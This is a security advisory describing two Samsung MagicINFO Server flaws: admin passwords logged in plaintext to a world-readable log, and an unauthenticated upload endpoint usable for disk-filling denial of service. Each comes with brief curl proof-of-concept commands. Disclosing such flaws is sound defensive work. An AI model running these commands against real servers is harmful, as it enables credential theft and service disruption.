Samsung MagicINFO Server Multiple Vulnerabilities
MagicINFO User Credential Disclosure (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
NOTE: Samsung mentioned this item may have been fixed with version 21.1090.1, but we were unable to confirm as new MagicInfo versions were not made available to us. We no longer observe that version to be available, and thus are including this issue here.
When a MagicINFO user logs into the MagicInfoLayoutEditor web application via endpoint /MagicInfoLayoutEditor/main, com.samsung.magicinfo.webauthor2.webapi.controller.MISLoginController#postLogin in MagicInfoLayoutEditor.war is invoked to handle the login request:
@Controller
@RequestMapping({"/main"})
public class MISLoginController { private MISLoginService misLoginService; [...] @PostMapping public String postLogin(@RequestParam(required = false) String username, @RequestParam(required = false) String password, @RequestParam(required = false) String language, @RequestParam(required = false) String token, @RequestParam(required = false) String contentId, @RequestParam(required = false) String deviceType, @RequestParam(required = false) String deviceGroupId, @RequestParam(required = false) String deviceId, @RequestParam(required = false) String editType, HttpServletResponse response, Model model) { logger.info("Login controller params: username=" + username + " password=" + password + " token=" + token + " language " + language + " contentId " + contentId + " deviceType " + deviceType + " deviceGroupId " + deviceGroupId + " deviceId " + deviceId); [...]As seen in the code above, user name and password are logged to a file, which is typically <MagicInfoInstallationDir>\tomcat\logs\magicinfo-layouteditor.log:
2025-10-13 16:33:36 INFO c.s.m.w.w.c.MISLoginController:62 - Login controller params: username=admin password=Password432! token=null language null contentId null deviceType null deviceGroupId null deviceId null
2025-10-13 16:33:36 INFO c.s.m.w.s.MISLoginServiceImpl:106 - loginToMIS: inspire token for user=admin with token=JDY5Mzk1MGU3YmUxZmQ5YmQkdA==
2025-10-13 16:33:36 DEBUG c.s.m.w.u.UserData:72 - clean user data: com.samsung.magicinfo.webauthor.util.UserData@16c7c2c0[userId=<null>,token=<null>,language=<null>]
2025-10-13 16:33:36 INFO c.s.m.w.w.c.MISLoginController:115 - Accessed WebAuthor main page.The magicinfo-layouteditor.log file is readable for the users in the Windows Users group. A local low-privileged Windows user can grab MagicINFO admin credentials to access the MagicINFO main webapp (/MagicInfo) with administrative privileges.
PoC:
- Run: curl -k -d 'username=admin&password=Password432!' 'https://<MagicInfoHost>:7002/MagicInfoLayoutEditor/main'
- Check: <MagicInfoInstallationDir>\tomcat\logs\magicinfo-layouteditor.logUnauthenticated File Upload (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
An unauthenticated remote attacker can upload a large number of large files to <MagicInfoInstallationDir>\runtime\upload\contents_home\
on a MagicINFO host via URL endpoint /MagicInfo/servlet/ContentInfo. This can fill up the disk drive where the product is installed, potentially leading to DoS.
PoC:
echo 'test' > /tmp/test.txt
curl -k -F 'file1.ext=@/tmp/test.txt' 'https://<MagicInfoHost>:7002/MagicInfo/servlet/ContentInfo'
curl -k -F 'file2.ext=@/tmp/test.txt' 'https://<MagicInfoHost>:7002/MagicInfo/servlet/ContentInfo'
[...]
